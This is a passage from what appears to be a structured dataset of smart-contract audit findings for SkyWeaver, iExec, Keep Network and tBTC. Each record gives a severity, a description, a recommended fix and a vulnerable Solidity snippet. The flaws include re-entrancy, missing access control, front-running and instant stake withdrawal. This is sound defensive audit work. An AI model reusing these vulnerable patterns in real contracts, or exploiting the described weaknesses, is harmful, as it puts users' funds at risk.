:\\n`getCurrentBlockNumber()` : gets current block number\\n`getCurrentEffectiveBlockNumber()` : calculates the effective block number deducting `frozenPeriod`чч```\\nfunction getCurrentStage() public view returns (uint8) {\\n return getStageAtBlock(getCurrentBlockNumber());\\n}\\n```\\n -Gold order size should be limitedчhighчWhen a user submits an order to buy gold cards, it's possible to buy a huge amount of cards. `_commit` function uses less gas than `mineGolds`, which means that the user can successfully commit to buying this amount of cards and when it's time to collect them, `mineGolds` function may run out of gas because it iterates over all card IDs and mints them:\\n```\\n// Mint gold cards\\nskyweaverAssets.batchMint(\\_order.cardRecipient, \\_ids, amounts, \"\");\\n```\\nчResolution\\nAddressed in horizon-games/SkyWeaver-contracts#9 by adding a limit for cold cards amount in one order.\\nLimit a maximum gold card amount in one order.чч```\\n// Mint gold cards\\nskyweaverAssets.batchMint(\\_order.cardRecipient, \\_ids, amounts, \"\");\\n```\\n -Price and refund changes may cause failuresчhighчPrice and refund for gold cards are used in 3 different places: commit, mint, refund.\\nWeave tokens spent during the commit phase\\n```\\nfunction \\_commit(uint256 \\_weaveAmount, GoldOrder memory \\_order)\\n internal\\n{\\n // Check if weave sent is sufficient for order\\n uint256 total\\_cost = \\_order.cardAmount.mul(goldPrice).add(\\_order.feeAmount);\\n uint256 refund\\_amount = \\_weaveAmount.sub(total\\_cost); // Will throw if insufficient amount received\\n```\\n\\nbut they are burned `rngDelay` blocks after\\n```\\n// Burn the non-refundable weave\\nuint256 weave\\_to\\_burn = (\\_order.cardAmount.mul(goldPrice)).sub(\\_order.cardAmount.mul(goldRefund));\\nweaveContract.burn(weaveID, weave\\_to\\_burn);\\n```\\n\\nIf the price is increased between these transactions, mining cards may fail because it should burn more `weave` tokens than there are tokens in the smart contract. Even if there are enough tokens during this particular transaction, someone may fail to melt a gold card later.\\nIf the price is decreased, some `weave` tokens will be stuck in the contract forever without being burned.чStore `goldPrice` and `goldRefund` in `GoldOrder`.чч```\\nfunction \\_commit(uint256 \\_weaveAmount, GoldOrder memory \\_order)\\n internal\\n{\\n // Check if weave sent is sufficient for order\\n uint256 total\\_cost = \\_order.cardAmount.mul(goldPrice).add(\\_order.feeAmount);\\n uint256 refund\\_amount = \\_weaveAmount.sub(total\\_cost); // Will throw if insufficient amount received\\n```\\n -Re-entrancy attack allows to buy EternalHeroes cheaperчhighчWhen buying eternal heroes in `_buy` function of `EternalHeroesFactory` contract, a buyer can do re-entracy before items are minted.\\n```\\nuint256 refundAmount = \\_arcAmount.sub(total\\_cost);\\nif (refundAmount > 0) {\\n arcadeumCoin.safeTransferFrom(address(this), \\_recipient, arcadeumCoinID, refundAmount, \"\");\\n}\\n\\n// Mint tokens to recipient\\nfactoryManager.batchMint(\\_recipient, \\_ids, amounts\\_to\\_mint, \"\");\\n```\\n\\nSince price should increase after every `N` items are minted, it's possible to buy more items with the old price.чAdd re-entrancy protection or mint items before sending the refund.чч```\\nuint256 refundAmount = \\_arcAmount.sub(total\\_cost);\\nif (refundAmount > 0) {\\n arcadeumCoin.safeTransferFrom(address(this), \\_recipient, arcadeumCoinID, refundAmount, \"\");\\n}\\n\\n// Mint tokens to recipient\\nfactoryManager.batchMint(\\_recipient, \\_ids, amounts\\_to\\_mint, \"\");\\n```\\n -Supply limitation misbehaviorsчmediumчIn `SWSupplyManager` contract, the `owner` can limit supply for any token ID by setting maxSupply:\\n```\\nfunction setMaxSupplies(uint256[] calldata \\_ids, uint256[] calldata \\_newMaxSupplies) external onlyOwner() {\\n require(\\_ids.length == \\_newMaxSupplies.length, \"SWSupplyManager#setMaxSupply: INVALID\\_ARRAYS\\_LENGTH\");\\n\\n // Can only \\*decrease\\* a max supply\\n // Can't set max supply back to 0\\n for (uint256 i = 0; i < \\_ids.length; i++ ) {\\n if (maxSupply[\\_ids[i]] > 0) {\\n require(\\n 0 < \\_newMaxSupplies[i] && \\_newMaxSupplies[i] < maxSupply[\\_ids[i]],\\n \"SWSupplyManager#setMaxSupply: INVALID\\_NEW\\_MAX\\_SUPPLY\"\\n );\\n }\\n maxSupply[\\_ids[i]] = \\_newMaxSupplies[i];\\n }\\n\\n emit MaxSuppliesChanged(\\_ids, \\_newMaxSupplies);\\n}\\n```\\n\\nThe problem is that you can set `maxSupply` that is lower than `currentSupply`, which would be an unexpected state to have.\\nAlso, if some tokens are burned, their `currentSupply` is not decreasing:\\n```\\nfunction burn(\\n uint256 \\_id,\\n uint256 \\_amount)\\n external\\n{\\n \\_burn(msg.sender, \\_id, \\_amount);\\n}\\n```\\n\\nThis unexpected behaviour may lead to burning all of the tokens without being able to mint more.чProperly track `currentSupply` by modifying it in `burn` function. Consider having a following restriction `require(_newMaxSupplies[i] > currentSupply[_ids[i]])` in `setMaxSupplies` function.чч```\\nfunction setMaxSupplies(uint256[] calldata \\_ids, uint256[] calldata \\_newMaxSupplies) external onlyOwner() {\\n require(\\_ids.length == \\_newMaxSupplies.length, \"SWSupplyManager#setMaxSupply: INVALID\\_ARRAYS\\_LENGTH\");\\n\\n // Can only \\*decrease\\* a max supply\\n // Can't set max supply back to 0\\n for (uint256 i = 0; i < \\_ids.length; i++ ) {\\n if (maxSupply[\\_ids[i]] > 0) {\\n require(\\n 0 < \\_newMaxSupplies[i] && \\_newMaxSupplies[i] < maxSupply[\\_ids[i]],\\n \"SWSupplyManager#setMaxSupply: INVALID\\_NEW\\_MAX\\_SUPPLY\"\\n );\\n }\\n maxSupply[\\_ids[i]] = \\_newMaxSupplies[i];\\n }\\n\\n emit MaxSuppliesChanged(\\_ids, \\_newMaxSupplies);\\n}\\n```\\n -importScore() in IexecMaintenanceDelegate can be used to wrongfully reset worker scores AcknowledgedчmediumчThe import of worker scores from the previous PoCo system deployed on chain is made to be asynchronous. And, even though the pull pattern usually makes a system much more resilient, in this case, it opens up the possibility for an attack that undermines the trust-based game-theoretical balance the PoCo system relies on. As can be seen in the following function:\\n```\\nfunction importScore(address \\_worker)\\nexternal override\\n{\\n require(!m\\_v3\\_scoreImported[\\_worker], \"score-already-imported\");\\n m\\_workerScores[\\_worker] = m\\_workerScores[\\_worker].max(m\\_v3\\_iexecHub.viewScore(\\_worker));\\n m\\_v3\\_scoreImported[\\_worker] = true;\\n}\\n```\\n\\nA motivated attacker could attack the system providing bogus results for computation tasks therefore reducing his own reputation (mirrored by the low worker score that would follow).\\nAfter the fact, the attacker could reset its score to the previous high value attained in the previously deployed PoCo system (v3) and undo all the wrongdoings he had done at no reputational cost.чResolution\\nUpdate from the iExec team:\\nIn order to perform this attack, one would first have to gain reputation on the new version, and lose it. They would then be able to restore its score from the old version.\\nWe feel the risk is acceptable for a few reasons:\\nIt can only be done once per worker\\nConsidering the score dynamics discussed in the “Trust in the PoCo” document, it is more interesting for a worker to import its reputation in the beginning rather then creating a new one, since bad contributions only remove part of the reputation\\nOnly a handful of workers have reputation in the old system (180), and their score is low (average 7, max 22)\\nWe might force the import all 180 workers with reputation >0. A script to identify the relevant addresses is already available.\\nCheck that each worker interacting with the PoCo system has already imported his score. Otherwise import it synchronously with a call at the time of their first interaction.чч```\\nfunction importScore(address \\_worker)\\nexternal override\\n{\\n require(!m\\_v3\\_scoreImported[\\_worker], \"score-already-imported\");\\n m\\_workerScores[\\_worker] = m\\_workerScores[\\_worker].max(m\\_v3\\_iexecHub.viewScore(\\_worker));\\n m\\_v3\\_scoreImported[\\_worker] = true;\\n}\\n```\\n -Domain separator in iExecMaintenanceDelegate has a wrong version field AcknowledgedчmediumчThe domain separator used to comply with the EIP712 standard in `iExecMaintenanceDelegate` has a wrong version field.\\n```\\nfunction \\_domain()\\ninternal view returns (IexecLibOrders\\_v5.EIP712Domain memory)\\n{\\n return IexecLibOrders\\_v5.EIP712Domain({\\n name: \"iExecODB\"\\n , version: \"3.0-alpha\"\\n , chainId: \\_chainId()\\n , verifyingContract: address(this)\\n });\\n}\\n```\\n\\nIn the above snippet we can see the code is still using the version field from an old version of the PoCo protocol, `\"3.0-alpha\"`.чResolution\\nIssue was fixed in iExecBlockchainComputing/[email protected]ebee370\\nChange the version field to: `\"5.0-alpha\"`чч```\\nfunction \\_domain()\\ninternal view returns (IexecLibOrders\\_v5.EIP712Domain memory)\\n{\\n return IexecLibOrders\\_v5.EIP712Domain({\\n name: \"iExecODB\"\\n , version: \"3.0-alpha\"\\n , chainId: \\_chainId()\\n , verifyingContract: address(this)\\n });\\n}\\n```\\n -The updateContract() method in ERC1538UpdateDelegate is incorrectly implementedчlowчThe `updateContract()` method in `ERC1538UpdateDelegate` does not behave as intended for some specific streams of bytes (meant to be parsed as function signatures).\\nThe mentioned function takes as input, among other things, a `string` (which is, canonically, a dynamically-sized `bytes` array) and tries to parse it as a conjunction of function signatures.\\nAs is evident in:\\n```\\nif (char == 0x3B) // 0x3B = ';'\\n```\\n\\nInside the function, `;` is being used as a “reserved” character, serving as a delimiter between each function signature.\\nHowever, if two semicolons are used in succession, the second one will not be checked and will be made part of the function signature being sent into the `_setFunc()` method.\\nExample of faulty input\\n`someFunc;;someOtherFuncWithSemiColon;`чResolution\\nIssue was fixed in iExecBlockchainComputing/[email protected]e6be083\\nReplace the line that increases the `pos` counter at the end of the function:\\n```\\nstart = ++pos;\\n```\\n\\nWIth this line of code:\\n`start = pos + 1;`чч```\\nif (char == 0x3B) // 0x3B = ';'\\n```\\n -TokenStaking.recoverStake allows instant stake undelegationчhighч`TokenStaking.recoverStake` is used to recover stake that has been designated to be undelegated. It contains a single check to ensure that the undelegation period has passed:\\n```\\nfunction recoverStake(address \\_operator) public {\\n uint256 operatorParams = operators[\\_operator].packedParams;\\n require(\\n block.number > operatorParams.getUndelegationBlock().add(undelegationPeriod),\\n \"Can not recover stake before undelegation period is over.\"\\n );\\n```\\n\\nHowever, if an undelegation period is never set, this will always return true, allowing any operator to instantly undelegate stake at any time.чRequire that the undelegation period is nonzero before allowing an operator to recover stake.чч```\\nfunction recoverStake(address \\_operator) public {\\n uint256 operatorParams = operators[\\_operator].packedParams;\\n require(\\n block.number > operatorParams.getUndelegationBlock().add(undelegationPeriod),\\n \"Can not recover stake before undelegation period is over.\"\\n );\\n```\\n -tbtc - No access control in TBTCSystem.requestNewKeepчhighч`TBTCSystem.requestNewKeep` is used by each new `Deposit` contract on creation. It calls `BondedECDSAKeepFactory.openKeep`, which sets the `Deposit` contract as the “owner,” a permissioned role within the created keep. `openKeep` also automatically allocates bonds from members registered to the application. The “application” from which member bonds are allocated is the tbtc system itself.\\nBecause `requestNewKeep` has no access controls, anyone can request that a keep be opened with `msg.sender` as the “owner,” and arbitrary signing threshold values:\\n```\\n/// @notice Request a new keep opening.\\n/// @param \\_m Minimum number of honest keep members required to sign.\\n/// @param \\_n Number of members in the keep.\\n/// @return Address of a new keep.\\nfunction requestNewKeep(uint256 \\_m, uint256 \\_n, uint256 \\_bond)\\n external\\n payable\\n returns (address)\\n{\\n IBondedECDSAKeepVendor \\_keepVendor = IBondedECDSAKeepVendor(keepVendor);\\n IBondedECDSAKeepFactory \\_keepFactory = IBondedECDSAKeepFactory(\\_keepVendor.selectFactory());\\n return \\_keepFactory.openKeep.value(msg.value)(\\_n, \\_m, msg.sender, \\_bond);\\n}\\n```\\n\\nGiven that the owner of a keep is able to seize signer bonds, close the keep, and more, having control of this role could be detrimental to group members.чResolution\\nIssue addressed in keep-network/tbtc#514. Each call to `requestNewKeep` makes a check that `uint(msg.sender)` is an existing `TBTCDepositToken`. Because these tokens are only minted in `DepositFactory`, `msg.sender` would have to be one of the cloned deposit contracts.\\nAdd access control to `requestNewKeep`, so that it can only be called as a part of the `Deposit` creation and initialization process.чч```\\n/// @notice Request a new keep opening.\\n/// @param \\_m Minimum number of honest keep members required to sign.\\n/// @param \\_n Number of members in the keep.\\n/// @return Address of a new keep.\\nfunction requestNewKeep(uint256 \\_m, uint256 \\_n, uint256 \\_bond)\\n external\\n payable\\n returns (address)\\n{\\n IBondedECDSAKeepVendor \\_keepVendor = IBondedECDSAKeepVendor(keepVendor);\\n IBondedECDSAKeepFactory \\_keepFactory = IBondedECDSAKeepFactory(\\_keepVendor.selectFactory());\\n return \\_keepFactory.openKeep.value(msg.value)(\\_n, \\_m, msg.sender, \\_bond);\\n}\\n```\\n -Unpredictable behavior due to front running or general bad timingчhighчIn a number of cases, administrators of contracts can update or upgrade things in the system without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to unfortunate timing of changes.\\nSome instances of this are more important than others, but in general users of the system should have assurances about the behavior of the action they're about to take.\\nSystem Parameters\\nThe owner of the `TBTCSystem` contract can change system parameters at any time with changes taking effect immediately.\\n`setSignerFeeDivisor` - stored in the deposit contract when creating a new deposit. emits an event.\\n`setLotSizes` - stored in the deposit contract when creating a new deposit. emits an event.\\n`setCollateralizationThresholds` - stored in the deposit contract when creating a new deposit. emits an event.\\nThis also opens up an opportunity for malicious owner to:\\ninterfere with other participants deposit creation attempts (front-running transactions)\\ncraft a series of transactions that allow the owner to set parameters that are more beneficial to them, then create a deposit and reset the parameters to the systems' initial settings.\\n```\\n/// @notice Set the system signer fee divisor.\\n/// @param \\_signerFeeDivisor The signer fee divisor.\\nfunction setSignerFeeDivisor(uint256 \\_signerFeeDivisor)\\n external onlyOwner\\n{\\n require(\\_signerFeeDivisor > 9, \"Signer fee divisor must be greater than 9, for a signer fee that is <= 10%.\");\\n signerFeeDivisor = \\_signerFeeDivisor;\\n emit SignerFeeDivisorUpdated(\\_signerFeeDivisor);\\n}\\n```\\n\\nUpgradables\\nThe proxy pattern used in many places throughout the system allows the operator to set a new implementation which takes effect immediately.\\n```\\n/\\*\\*\\n \\* @dev Upgrade current implementation.\\n \\* @param \\_implementation Address of the new implementation contract.\\n \\*/\\nfunction upgradeTo(address \\_implementation)\\n public\\n onlyOwner\\n{\\n address currentImplementation = implementation();\\n require(\\_implementation != address(0), \"Implementation address can't be zero.\");\\n require(\\_implementation != currentImplementation, \"Implementation address must be different from the current one.\");\\n setImplementation(\\_implementation);\\n emit Upgraded(\\_implementation);\\n}\\n```\\n\\n```\\n/// @notice Upgrades the current vendor implementation.\\n/// @param \\_implementation Address of the new vendor implementation contract.\\nfunction upgradeTo(address \\_implementation) public onlyOwner {\\n address currentImplementation = implementation();\\n require(\\n \\_implementation != address(0),\\n \"Implementation address can't be zero.\"\\n );\\n require(\\n \\_implementation != currentImplementation,\\n \"Implementation address must be different from the current one.\"\\n );\\n setImplementation(\\_implementation);\\n emit Upgraded(\\_implementation);\\n}\\n```\\n\\nRegistry\\n```\\nfunction registerFactory(address payable \\_factory) external onlyOperatorContractUpgrader {\\n require(\\_factory != address(0), \"Incorrect factory address\");\\n require(\\n registry.isApprovedOperatorContract(\\_factory),\\n \"Factory contract is not approved\"\\n );\\n keepFactory = \\_factory;\\n}\\n```\\nчThe underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.чч```\\n/// @notice Set the system signer fee divisor.\\n/// @param \\_signerFeeDivisor The signer fee divisor.\\nfunction setSignerFeeDivisor(uint256 \\_signerFeeDivisor)\\n external onlyOwner\\n{\\n require(\\_signerFeeDivisor > 9, \"Signer fee divisor must be greater than 9, for a signer fee that is <= 10%.\");\\n signerFeeDivisor = \\_signerFeeDivisor;\\n emit SignerFeeDivisorUpdated(\\_signerFeeDivisor);\\n}\\n```\\n -keep-core - reportRelayEntryTimeout creates an incentive for nodes to race for rewards potentially wasting gas and it creates an opportunity for front-runningчhighчThe incentive on `reportRelayEntryTimeout` for being rewarded with 5% of the seized amount creates an incentive to call the method but might also kick off a race for front-running this call. This method is being called from the keep node which is unlikely to adjust the gasPrice and might always lose the race against a front-running bot collecting rewards for all timeouts and fraud proofs (issue 5.7)\\n```\\n/\\*\\*\\n \\* @dev Function used to inform about the fact the currently ongoing\\n \\* new relay entry generation operation timed out. As a result, the group\\n \\* which was supposed to produce a new relay entry is immediately\\n \\* terminated and a new group is selected to produce a new relay entry.\\n \\* All members of the group are punished by seizing minimum stake of\\n \\* their tokens. The submitter of the transaction is rewarded with a\\n \\* tattletale reward which is limited to min(1, 20 / group\\_size) of the\\n \\* maximum tattletale reward.\\n \\*/\\nfunction reportRelayEntryTimeout() public {\\n require(hasEntryTimedOut(), \"Entry did not time out\");\\n groups.reportRelayEntryTimeout(signingRequest.groupIndex, groupSize, minimumStake);\\n\\n // We could terminate the last active group. If that's the case,\\n // do not try to execute signing again because there is no group\\n // which can handle it.\\n if (numberOfGroups() > 0) {\\n signRelayEntry(\\n signingRequest.relayRequestId,\\n signingRequest.previousEntry,\\n signingRequest.serviceContract,\\n signingRequest.entryVerificationAndProfitFee,\\n signingRequest.callbackFee\\n );\\n }\\n}\\n```\\nчMake sure that `reportRelayEntryTimeout` throws as early as possible if the group was previously terminated (isGroupTerminated) to avoid that keep-nodes spend gas on a call that will fail. Depending on the reward for calling out the timeout this might create a front-running opportunity that cannot be resolved.чч```\\n/\\*\\*\\n \\* @dev Function used to inform about the fact the currently ongoing\\n \\* new relay entry generation operation timed out. As a result, the group\\n \\* which was supposed to produce a new relay entry is immediately\\n \\* terminated and a new group is selected to produce a new relay entry.\\n \\* All members of the group are punished by seizing minimum stake of\\n \\* their tokens. The submitter of the transaction is rewarded with a\\n \\* tattletale reward which is limited to min(1, 20 / group\\_size) of the\\n \\* maximum tattletale reward.\\n \\*/\\nfunction reportRelayEntryTimeout() public {\\n require(hasEntryTimedOut(), \"Entry did not time out\");\\n groups.reportRelayEntryTimeout(signingRequest.groupIndex, groupSize, minimumStake);\\n\\n // We could terminate the last active group. If that's the case,\\n // do not try to execute signing again because there is no group\\n // which can handle it.\\n if (numberOfGroups() > 0) {\\n signRelayEntry(\\n signingRequest.relayRequestId,\\n signingRequest.previousEntry,\\n signingRequest.serviceContract,\\n signingRequest.entryVerificationAndProfitFee,\\n signingRequest.callbackFee\\n );\\n }\\n}\\n```\\n -keep-core - reportUnauthorizedSigning fraud proof is not bound to reporter and can be front-runчhighчAn attacker can monitor `reportUnauthorizedSigning()` for fraud reports and attempt to front-run the original call in an effort to be the first one reporting the fraud and be rewarded 5% of the total seized amount.\\n```\\n/\\*\\*\\n \\* @dev Reports unauthorized signing for the provided group. Must provide\\n \\* a valid signature of the group address as a message. Successful signature\\n \\* verification means the private key has been leaked and all group members\\n \\* should be punished by seizing their tokens. The submitter of this proof is\\n \\* rewarded with 5% of the total seized amount scaled by the reward adjustment\\n \\* parameter and the rest 95% is burned.\\n \\*/\\nfunction reportUnauthorizedSigning(\\n uint256 groupIndex,\\n bytes memory signedGroupPubKey\\n) public {\\n groups.reportUnauthorizedSigning(groupIndex, signedGroupPubKey, minimumStake);\\n}\\n```\\nчRequire the reporter to include `msg.sender` in the signature proving the fraud or implement a two-step commit/reveal scheme to counter front-running opportunities by forcing a reporter to secretly commit the fraud parameters in one block and reveal them in another.чч```\\n/\\*\\*\\n \\* @dev Reports unauthorized signing for the provided group. Must provide\\n \\* a valid signature of the group address as a message. Successful signature\\n \\* verification means the private key has been leaked and all group members\\n \\* should be punished by seizing their tokens. The submitter of this proof is\\n \\* rewarded with 5% of the total seized amount scaled by the reward adjustment\\n \\* parameter and the rest 95% is burned.\\n \\*/\\nfunction reportUnauthorizedSigning(\\n uint256 groupIndex,\\n bytes memory signedGroupPubKey\\n) public {\\n groups.reportUnauthorizedSigning(groupIndex, signedGroupPubKey, minimumStake);\\n}\\n```\\n -keep-core - operator contracts disabled via panic button can be re-enabled by RegistryKeeperчhighчThe Registry contract defines three administrative accounts: `Governance`, `registryKeeper`, and `panicButton`. All permissions are initially assigned to the deployer when the contract is created. The account acting like a super-admin, being allowed to re-assign administrative accounts - is `Governance`. `registryKeeper` is a lower privileged account maintaining the registry and `panicButton` is an emergency account that can disable operator contracts.\\nThe keep specification states the following:\\nPanic Button The Panic Button can disable malicious or malfunctioning contracts that have been previously approved by the Registry Keeper. When a contract is disabled by the Panic Button, its status on the registry changes to reflect this, and it becomes ineligible to penalize operators. Contracts disabled by the Panic Button can not be reactivated. The Panic Button can be rekeyed by Governance.\\nIt is assumed that the permissions are `Governance` > `panicButton` > `registryKeeper`, meaning that `panicButton` should be able to overrule `registryKeeper`, while `registryKeeper` cannot overrule `panicButton`.\\nWith the current implementation of the Registry the `registryKeeper` account can re-enable an operator contract that has previously been disabled by the `panicButton` account.\\nWe would also like to note the following:\\nThe contract should use enums instead of integer literals when working with contract states.\\nChanges to the contract take effect immediately, allowing an administrative account to selectively front-run calls to the Registry ACL and interfere with user activity.\\nThe operator contract state can be set to the current value without raising an error.\\nThe panic button can be called for operator contracts that are not yet active.\\n```\\nfunction approveOperatorContract(address operatorContract) public onlyRegistryKeeper {\\n operatorContracts[operatorContract] = 1;\\n}\\n\\nfunction disableOperatorContract(address operatorContract) public onlyPanicButton {\\n operatorContracts[operatorContract] = 2;\\n}\\n```\\nчThe keep specification states:\\nThe Panic Button can be used to set the status of an APPROVED contract to DISABLED. Operator Contracts disabled with the Panic Button cannot be re-enabled, and disabled contracts may not punish operators nor be selected by service contracts to perform work.\\nAll three accounts are typically trusted. We recommend requiring the `Governance` or `paniceButton` accounts to reset the contract operator state before `registryKeeper` can change the state or disallow re-enabling of disabled operator contracts as stated in the specification.чч```\\nfunction approveOperatorContract(address operatorContract) public onlyRegistryKeeper {\\n operatorContracts[operatorContract] = 1;\\n}\\n\\nfunction disableOperatorContract(address operatorContract) public onlyPanicButton {\\n operatorContracts[operatorContract] = 2;\\n}\\n```\\n -tbtc - State transitions are not always enforcedчhighчA deposit follows a complex state-machine that makes sure it is correctly funded before `TBTC` Tokens are minted. The deposit lifecycle starts with a set of states modeling a funding flow that - if successful - ultimately leads to the deposit being active, meaning that corresponding `TBTC` tokens exist for the deposits. A redemption flow allows to redeem `TBTC` for `BTC` and a liquidation flow handles fraud and abort conditions. Fraud cases in the funding flow are handled separately.\\nState transitions from one deposit state to another require someone calling the corresponding transition method on the deposit and actually spend gas on it. The incentive to call a transition varies and is analyzed in more detail in the security-specification section of this report.\\nThis issue assumes that participants are not always pushing forward through the state machine as soon as a new state becomes available, opening up the possibility of having multiple state transitions being a valid option for a deposit (e.g. pushing a deposit to active state even though a timeout should have been called on it).\\nA TDT holder can choose not to call out `notifySignerSetupFailure` hoping that the signing group still forms after the signer setup timeout passes.\\nthere is no incentive for the TDT holder to terminate its own deposit after a timeout.\\nthe deposit might end up never being in a final error state.\\nthere is no incentive for the signing group to terminate the deposit.\\nThis affects all states that can time out.\\nThe deposit can be pushed to active state even after `notifySignerSetupFailure`, `notifyFundingTimeout` have passed but nobody called it out.\\nThere is no timeout check in `retrieveSignerPubkey`, `provideBTCFundingProof`.\\n```\\n/// @notice we poll the Keep contract to retrieve our pubkey\\n/// @dev We store the pubkey as 2 bytestrings, X and Y.\\n/// @param \\_d deposit storage pointer\\n/// @return True if successful, otherwise revert\\nfunction retrieveSignerPubkey(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), \"Not currently awaiting signer setup\");\\n\\n bytes memory \\_publicKey = IBondedECDSAKeep(\\_d.keepAddress).getPublicKey();\\n require(\\_publicKey.length == 64, \"public key not set or not 64-bytes long\");\\n```\\n\\n```\\nfunction provideBTCFundingProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n uint8 \\_fundingOutputIndex,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n bytes memory \\_bitcoinHeaders\\n) public returns (bool) {\\n\\n require(\\_d.inAwaitingBTCFundingProof(), \"Not awaiting funding\");\\n\\n bytes8 \\_valueBytes;\\n bytes memory \\_utxoOutpoint;\\n```\\n\\nMembers of the signing group might decide to call `notifyFraudFundingTimeout` in a race to avoid late submissions for `provideFraudBTCFundingProof` to succeed in order to contain funds lost due to fraud.\\nIt should be noted that even after the fraud funding timeout passed the TDT holder could `provideFraudBTCFundingProof` as it does not check for the timeout.\\nA malicious signing group observes BTC funding on the bitcoin chain in an attempt to commit fraud at the time the `provideBTCFundingProof` transition becomes available to front-run `provideFundingECDSAFraudProof` forcing the deposit into active state.\\nThe malicious users of the signing group can then try to report fraud, set themselves as `liquidationInitiator` to be awarded part of the signer bond (in addition to taking control of the BTC collateral).\\nThe TDT holders fraud-proof can be front-run, see issue 5.15\\nIf oracle price slippage occurs for one block (flash-crash type of event) someone could call an undercollateralization transition.\\nFor severe oracle errors deposits might be liquidated by calling `notifyUndercollateralizedLiquidation`. The TDT holder cannot exit liquidation in this case.\\nFor non-severe under collateralization someone could call `notifyCourtesyCall` to impose extra effort on TDT holders to `exitCourtesyCall` deposits.\\nA deposit term expiration courtesy call can be exit in the rare case where `_d.fundedAt + TBTCConstants.getDepositTerm() == block.timestamp`\\n```\\n/// @notice Goes from courtesy call to active\\n/// @dev Only callable if collateral is sufficient and the deposit is not expiring\\n/// @param \\_d deposit storage pointer\\nfunction exitCourtesyCall(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inCourtesyCall(), \"Not currently in courtesy call\");\\n require(block.timestamp <= \\_d.fundedAt + TBTCConstants.getDepositTerm(), \"Deposit is expiring\");\\n require(getCollateralizationPercentage(\\_d) >= \\_d.undercollateralizedThresholdPercent, \"Deposit is still undercollateralized\");\\n \\_d.setActive();\\n \\_d.logExitedCourtesyCall();\\n}\\n```\\n\\n```\\n/// @notice Notifies the contract that its term limit has been reached\\n/// @dev This initiates a courtesy call\\n/// @param \\_d deposit storage pointer\\nfunction notifyDepositExpiryCourtesyCall(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inActive(), \"Deposit is not active\");\\n require(block.timestamp >= \\_d.fundedAt + TBTCConstants.getDepositTerm(), \"Deposit term not elapsed\");\\n \\_d.setCourtesyCall();\\n \\_d.logCourtesyCalled();\\n \\_d.courtesyCallInitiated = block.timestamp;\\n}\\n```\\n\\nAllow exiting the courtesy call only if the deposit is not expired: `block.timestamp < _d.fundedAt + TBTCConstants.getDepositTerm()`чEnsure that there are no competing interests between participants of the system to favor one transition over the other, causing race conditions, front-running opportunities or stale deposits that are not pushed to end-states.\\nNote: Please find an analysis of incentives to call state transitions in the security section of this document.чч```\\n/// @notice we poll the Keep contract to retrieve our pubkey\\n/// @dev We store the pubkey as 2 bytestrings, X and Y.\\n/// @param \\_d deposit storage pointer\\n/// @return True if successful, otherwise revert\\nfunction retrieveSignerPubkey(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), \"Not currently awaiting signer setup\");\\n\\n bytes memory \\_publicKey = IBondedECDSAKeep(\\_d.keepAddress).getPublicKey();\\n require(\\_publicKey.length == 64, \"public key not set or not 64-bytes long\");\\n```\\n -tbtc - Funder loses payment to keep if signing group is not established in time PendingчhighчTo create a new deposit, the funder has to pay for the creation of a keep. If establishing the keep does not succeed in time, fails or the signing group decides not to return a public key when `retrieveSignerPubkey` is called to transition from `awaiting_signer_setup` to `awaiting_btc_funding_proof` the signer setup fails. After a timeout of 3 hrs, anyone can force the deposit to transition from `awaiting_signer_setup` to `failed_setup` by calling `notifySignerSetupFailure`.\\nThe funder had to provide payment for the keep but the signing group failed to establish. Payment for the keep is not returned even though one could assume that the signing group tried to play unfairly. The signing group might intentionally try to cause this scenario to interfere with the system.\\n`retrieveSignerPubkey` fails if keep provided pubkey is empty or of an unexpected length\\n```\\n/// @notice we poll the Keep contract to retrieve our pubkey\\n/// @dev We store the pubkey as 2 bytestrings, X and Y.\\n/// @param \\_d deposit storage pointer\\n/// @return True if successful, otherwise revert\\nfunction retrieveSignerPubkey(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), \"Not currently awaiting signer setup\");\\n\\n bytes memory \\_publicKey = IBondedECDSAKeep(\\_d.keepAddress).getPublicKey();\\n require(\\_publicKey.length == 64, \"public key not set or not 64-bytes long\");\\n\\n \\_d.signingGroupPubkeyX = \\_publicKey.slice(0, 32).toBytes32();\\n \\_d.signingGroupPubkeyY = \\_publicKey.slice(32, 32).toBytes32();\\n require(\\_d.signingGroupPubkeyY != bytes32(0) && \\_d.signingGroupPubkeyX != bytes32(0), \"Keep returned bad pubkey\");\\n \\_d.fundingProofTimerStart = block.timestamp;\\n\\n \\_d.setAwaitingBTCFundingProof();\\n \\_d.logRegisteredPubkey(\\n \\_d.signingGroupPubkeyX,\\n \\_d.signingGroupPubkeyY);\\n}\\n```\\n\\n`notifySignerSetupFailure` can be called by anyone after a timeout of 3hrs\\n```\\n/// @notice Anyone may notify the contract that signing group setup has timed out\\n/// @dev We rely on the keep system punishes the signers in this case\\n/// @param \\_d deposit storage pointer\\nfunction notifySignerSetupFailure(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), \"Not awaiting setup\");\\n require(\\n block.timestamp > \\_d.signingGroupRequestedAt + TBTCConstants.getSigningGroupFormationTimeout(),\\n \"Signing group formation timeout not yet elapsed\"\\n );\\n \\_d.setFailedSetup();\\n \\_d.logSetupFailed();\\n\\n fundingTeardown(\\_d);\\n}\\n```\\nчIt should be ensured that a keep group always establishes or otherwise the funder is refunded the fee for the keep.чч```\\n/// @notice we poll the Keep contract to retrieve our pubkey\\n/// @dev We store the pubkey as 2 bytestrings, X and Y.\\n/// @param \\_d deposit storage pointer\\n/// @return True if successful, otherwise revert\\nfunction retrieveSignerPubkey(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), \"Not currently awaiting signer setup\");\\n\\n bytes memory 